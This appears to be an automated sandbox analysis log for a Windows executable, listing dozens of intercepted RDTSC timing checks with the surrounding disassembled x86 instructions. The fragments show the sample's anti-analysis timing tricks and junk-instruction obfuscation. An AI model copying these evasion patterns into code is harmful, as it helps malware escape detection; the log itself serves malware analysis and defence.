                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: B90C08 second address: B90C0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: B90C0C second address: B90C33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jp 00007F5D20D3D6AAh 0x0000000d jnc 00007F5D20D3D68Eh 0x00000013 jp 00007F5D20D3D686h 0x00000019 push edi 0x0000001a pop edi 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F5D20D3D68Ah 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: B90C33 second address: B90C37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: B913CD second address: B913F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jne 00007F5D20D3D686h 0x00000009 js 00007F5D20D3D686h 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push edi 0x00000013 pushad 0x00000014 jmp 00007F5D20D3D68Ch 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: B9152D second address: B91539 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F5D20C24756h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: B93093 second address: B9309D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: B95F88 second address: B95F8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: B95F8D second address: B96044 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20D3D68Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c pushad 0x0000000d mov ax, 133Ah 0x00000011 mov ebx, dword ptr [ebp+12453F08h] 0x00000017 popad 0x00000018 adc edx, 43A0A9E7h 0x0000001e push dword ptr [ebp+122D1A3Fh] 0x00000024 push 00000000h 0x00000026 push ebp 0x00000027 call 00007F5D20D3D688h 0x0000002c pop ebp 0x0000002d mov dword ptr [esp+04h], ebp 0x00000031 add dword ptr [esp+04h], 00000016h 0x00000039 inc ebp 0x0000003a push ebp 0x0000003b ret 0x0000003c pop ebp 0x0000003d ret 0x0000003e mov edx, 6053E542h 0x00000043 call 00007F5D20D3D689h 0x00000048 jg 00007F5D20D3D69Bh 0x0000004e push eax 0x0000004f jmp 00007F5D20D3D691h 0x00000054 mov eax, dword ptr [esp+04h] 0x00000058 jnl 00007F5D20D3D698h 0x0000005e mov eax, dword ptr [eax] 0x00000060 pushad 0x00000061 jmp 00007F5D20D3D68Eh 0x00000066 jc 00007F5D20D3D68Ch 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: B9739F second address: B973A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: B973A3 second address: B973C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F5D20D3D68Bh 0x00000014 jnc 00007F5D20D3D686h 0x0000001a push esi 0x0000001b pop esi 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: B99156 second address: B9915C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: B9915C second address: B9916E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5D20D3D68Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: B9916E second address: B99172 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: B99172 second address: B9918E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5D20D3D694h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: B9918E second address: B991C9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F5D20C24767h 0x0000000e push esi 0x0000000f push esi 0x00000010 pop esi 0x00000011 jg 00007F5D20C24756h 0x00000017 pop esi 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F5D20C2475Dh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: B991C9 second address: B991CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: B98CF7 second address: B98CFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: AABF82 second address: AABF8C instructions: 0x00000000 rdtsc 0x00000002 js 00007F5D20D3D68Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: 50506A8 second address: 50506AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: 50506AE second address: 50506EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5D20D3D698h 0x00000009 and ch, 00000038h 0x0000000c jmp 00007F5D20D3D68Bh 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F5D20D3D68Bh 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: 50506EC second address: 50506F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: 50506F0 second address: 50506F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: 50506F6 second address: 505071C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5D20C24769h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: 505071C second address: 505077E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5D20D3D697h 0x00000009 xor cx, 26BEh 0x0000000e jmp 00007F5D20D3D699h 0x00000013 popfd 0x00000014 mov ebx, ecx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov ebp, esp 0x0000001b pushad 0x0000001c movzx esi, bx 0x0000001f jmp 00007F5D20D3D695h 0x00000024 popad 0x00000025 xchg eax, ecx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: 505077E second address: 5050782 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: 5050782 second address: 5050786 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: 5050786 second address: 505078C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: 505078C second address: 50507A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20D3D692h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: 50507A8 second address: 50507AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: 50507AC second address: 50507DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edi, ecx 0x00000006 popad 0x00000007 xchg eax, ecx 0x00000008 jmp 00007F5D20D3D692h 0x0000000d xchg eax, esi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 call 00007F5D20D3D68Dh 0x00000016 pop ecx 0x00000017 mov ax, dx 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: 50507DC second address: 50507F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20C2475Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov eax, 0E4D4923h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: 50507F5 second address: 50507FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: 50507FA second address: 5050801 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: 5050801 second address: 505081F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, esi 0x00000008 jmp 00007F5D20D3D68Dh 0x0000000d lea eax, dword ptr [ebp-04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: 505081F second address: 5050823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: 5050823 second address: 5050829 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: 5050829 second address: 505083E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5D20C24761h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: 505083E second address: 5050842 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: 50508B1 second address: 50508B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: 50508B7 second address: 50508BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: 505090D second address: 5040022 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 299Fh 0x00000007 pushfd 0x00000008 jmp 00007F5D20C24764h 0x0000000d sbb cx, C908h 0x00000012 jmp 00007F5D20C2475Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov eax, esi 0x0000001d jmp 00007F5D20C24766h 0x00000022 pop esi 0x00000023 jmp 00007F5D20C24760h 0x00000028 leave 0x00000029 jmp 00007F5D20C24760h 0x0000002e retn 0004h 0x00000031 nop 0x00000032 cmp eax, 00000000h 0x00000035 setne al 0x00000038 jmp 00007F5D20C24752h 0x0000003a xor ebx, ebx 0x0000003c test al, 01h 0x0000003e jne 00007F5D20C24757h 0x00000040 sub esp, 04h 0x00000043 mov dword ptr [esp], 0000000Dh 0x0000004a call 00007F5D25391D4Bh 0x0000004f mov edi, edi 0x00000051 jmp 00007F5D20C2475Eh 0x00000056 xchg eax, ebp 0x00000057 pushad 0x00000058 call 00007F5D20C2475Eh 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: 5040022 second address: 5040043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov ebx, 14D954C4h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F5D20D3D68Fh 0x00000014 push eax 0x00000015 pop ebx 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: 5040043 second address: 504008F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20C24765h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F5D20C2475Eh 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 push ecx 0x00000013 jmp 00007F5D20C2475Dh 0x00000018 pop ecx 0x00000019 mov edx, 591D37B4h 0x0000001e popad 0x0000001f sub esp, 2Ch 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 pushad 0x00000026 popad 0x00000027 mov di, ax 0x0000002a popad 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: 504008F second address: 50400B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 jmp 00007F5D20D3D699h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 movzx eax, bx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: 50400B7 second address: 50400DF instructions: 0x00000000 rdtsc 0x00000002 mov bx, 79BAh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, ebx 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007F5D20C2475Ch 0x00000011 xchg eax, ebx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F5D20C2475Ch 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: 50400DF second address: 504011A instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 jmp 00007F5D20D3D696h 0x0000000e mov dword ptr [esp], edi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F5D20D3D697h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: 5040244 second address: 504024A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: 504024A second address: 5040280 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 pushad 0x0000000a jmp 00007F5D20D3D692h 0x0000000f jmp 00007F5D20D3D692h 0x00000014 popad 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: 5040280 second address: 5040284 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: 5040284 second address: 504028A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: 504039D second address: 504041C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20C24764h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d call 00007F5D20C2475Eh 0x00000012 jmp 00007F5D20C24762h 0x00000017 pop ecx 0x00000018 pushfd 0x00000019 jmp 00007F5D20C2475Bh 0x0000001e or si, 423Eh 0x00000023 jmp 00007F5D20C24769h 0x00000028 popfd 0x00000029 popad 0x0000002a lea eax, dword ptr [ebp-2Ch] 0x0000002d jmp 00007F5D20C2475Eh 0x00000032 xchg eax, esi 0x00000033 pushad 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: 504041C second address: 5040470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushfd 0x00000006 jmp 00007F5D20D3D698h 0x0000000b sbb si, E198h 0x00000010 jmp 00007F5D20D3D68Bh 0x00000015 popfd 0x00000016 popad 0x00000017 push eax 0x00000018 pushad 0x00000019 push edi 0x0000001a mov di, ax 0x0000001d pop esi 0x0000001e mov edi, 3ED6B712h 0x00000023 popad 0x00000024 xchg eax, esi 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F5D20D3D694h 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: 5040470 second address: 5040482 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5D20C2475Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: 5040482 second address: 50404F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20D3D68Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c pushad 0x0000000d mov cl, 7Dh 0x0000000f mov eax, edx 0x00000011 popad 0x00000012 push eax 0x00000013 pushad 0x00000014 jmp 00007F5D20D3D698h 0x00000019 pushfd 0x0000001a jmp 00007F5D20D3D692h 0x0000001f sub eax, 78D3AB18h 0x00000025 jmp 00007F5D20D3D68Bh 0x0000002a popfd 0x0000002b popad 0x0000002c nop 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F5D20D3D695h 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: 50404F2 second address: 50404F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: 50404F8 second address: 504051E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F5D20D3D694h 0x0000000e mov dword ptr [esp], ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: 504051E second address: 5040524 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: 504054B second address: 5040551 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: 5040551 second address: 5040571 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5D20C24764h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: 5040571 second address: 5040577 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: 5040577 second address: 504057B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: 504057B second address: 5030E43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a jmp 00007F5D20D3D699h 0x0000000f je 00007F5D9292B73Dh 0x00000015 xor eax, eax 0x00000017 jmp 00007F5D20D16DBAh 0x0000001c pop esi 0x0000001d pop edi 0x0000001e pop ebx 0x0000001f leave 0x00000020 retn 0004h 0x00000023 nop 0x00000024 xor ebx, ebx 0x00000026 cmp eax, 00000000h 0x00000029 je 00007F5D20D3D7E3h 0x0000002f call 00007F5D2549B8BDh 0x00000034 mov edi, edi 0x00000036 jmp 00007F5D20D3D697h 0x0000003b xchg eax, ebp 0x0000003c jmp 00007F5D20D3D696h 0x00000041 push eax 0x00000042 pushad 0x00000043 pushfd 0x00000044 jmp 00007F5D20D3D68Dh 0x00000049 adc ecx, 29383C56h 0x0000004f jmp 00007F5D20D3D691h 0x00000054 popfd 0x00000055 popad 0x00000056 xchg eax, ebp 0x00000057 jmp 00007F5D20D3D68Eh 0x0000005c mov ebp, esp 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 pushfd 0x00000062 jmp 00007F5D20D3D68Dh 0x00000067 sub cl, 00000066h 0x0000006a jmp 00007F5D20D3D691h 0x0000006f popfd 0x00000070 mov ebx, ecx 0x00000072 popad 0x00000073 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: 5030E43 second address: 5030E49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: 5030E49 second address: 5030E7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007F5D20D3D690h 0x0000000e mov dword ptr [esp], ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F5D20D3D697h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: 5040A46 second address: 5040A4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: 5040A4A second address: 5040A50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: 5040B69 second address: 5040B6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: 5040B6F second address: 5040B73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: 5040B73 second address: 5040BA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007F5D20C24759h 0x0000000d jmp 00007F5D20C24767h 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 movzx esi, dx 0x00000019 mov si, dx 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: 5040BA6 second address: 5040C59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20D3D698h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F5D20D3D691h 0x00000014 xor ecx, 6901F136h 0x0000001a jmp 00007F5D20D3D691h 0x0000001f popfd 0x00000020 jmp 00007F5D20D3D690h 0x00000025 popad 0x00000026 mov eax, dword ptr [eax] 0x00000028 jmp 00007F5D20D3D68Bh 0x0000002d mov dword ptr [esp+04h], eax 0x00000031 jmp 00007F5D20D3D699h 0x00000036 pop eax 0x00000037 jmp 00007F5D20D3D68Eh 0x0000003c call 00007F5D929225BDh 0x00000041 push 76C22B70h 0x00000046 push dword ptr fs:[00000000h] 0x0000004d mov eax, dword ptr [esp+10h] 0x00000051 mov dword ptr [esp+10h], ebp 0x00000055 lea ebp, dword ptr [esp+10h] 0x00000059 sub esp, eax 0x0000005b push ebx 0x0000005c push esi 0x0000005d push edi 0x0000005e mov eax, dword ptr [76C84538h] 0x00000063 xor dword ptr [ebp-04h], eax 0x00000066 xor eax, ebp 0x00000068 push eax 0x00000069 mov dword ptr [ebp-18h], esp 0x0000006c push dword ptr [ebp-08h] 0x0000006f mov eax, dword ptr [ebp-04h] 0x00000072 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000079 mov dword ptr [ebp-08h], eax 0x0000007c lea eax, dword ptr [ebp-10h] 0x0000007f mov dword ptr fs:[00000000h], eax 0x00000085 ret 0x00000086 push eax 0x00000087 push edx 0x00000088 jmp 00007F5D20D3D697h 0x0000008d rdtsc
